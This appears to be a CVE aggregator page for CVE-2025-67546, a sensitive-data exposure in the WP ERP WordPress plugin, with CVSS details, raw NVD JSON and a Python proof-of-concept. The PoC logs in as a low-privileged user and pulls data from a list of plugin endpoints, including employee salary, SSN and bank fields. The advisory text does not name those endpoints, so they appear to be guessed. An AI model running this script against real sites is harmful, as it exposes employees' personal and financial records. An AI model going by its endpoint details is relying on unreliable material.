Security Vulnerability Report
中文
CVE-2025-67546 CVSS 6.5 MEDIUM

CVE-2025-67546

Published: 2025-12-18 08:16:17
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in weDevs WP ERP erp allows Retrieve Embedded Sensitive Data.This issue affects WP ERP: from n/a through <= 1.16.6.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP ERP <= 1.16.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67546 PoC - WP ERP Sensitive Data Exposure # Target: WordPress site with WP ERP plugin <= 1.16.6 def exploit(target_url, username, password): """ Exploit sensitive information disclosure in WP ERP plugin. This PoC demonstrates how low-privileged users can access sensitive data. """ # Setup session session = requests.Session() # Login as low-privileged user login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f"[*] Logging in as {username}...") response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed!") return False print("[+] Login successful!") # Exploit the sensitive data exposure # Target various WP ERP endpoints that expose sensitive information sensitive_endpoints = [ '/wp-json/erp/v1/company/employees', '/wp-json/erp/v1/crm/contacts', '/wp-json/erp/v1/accounting/transactions', '/wp-json/erp/v1/hrm/employees?fields=salary,ssn,bank_info', '/wp-admin/admin-ajax.php?action=erp_get_company_sensitive_data', ] print("[*] Attempting to retrieve sensitive information...") for endpoint in sensitive_endpoints: url = target_url + endpoint try: response = session.get(url, timeout=10) if response.status_code == 200 and 'error' not in response.text.lower(): print(f"[+] Sensitive data found at: {endpoint}") print(f" Response preview: {response.text[:500]}...") except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return True if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://target.com subscriber password123") sys.exit(1) target = sys.argv[1].rstrip('/') user = sys.argv[2] pwd = sys.argv[3] exploit(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67546", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:16.693", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in weDevs WP ERP erp allows Retrieve Embedded Sensitive Data.This issue affects WP ERP: from n/a through <= 1.16.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/erp/vulnerability/wordpress-wp-erp-plugin-1-16-6-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}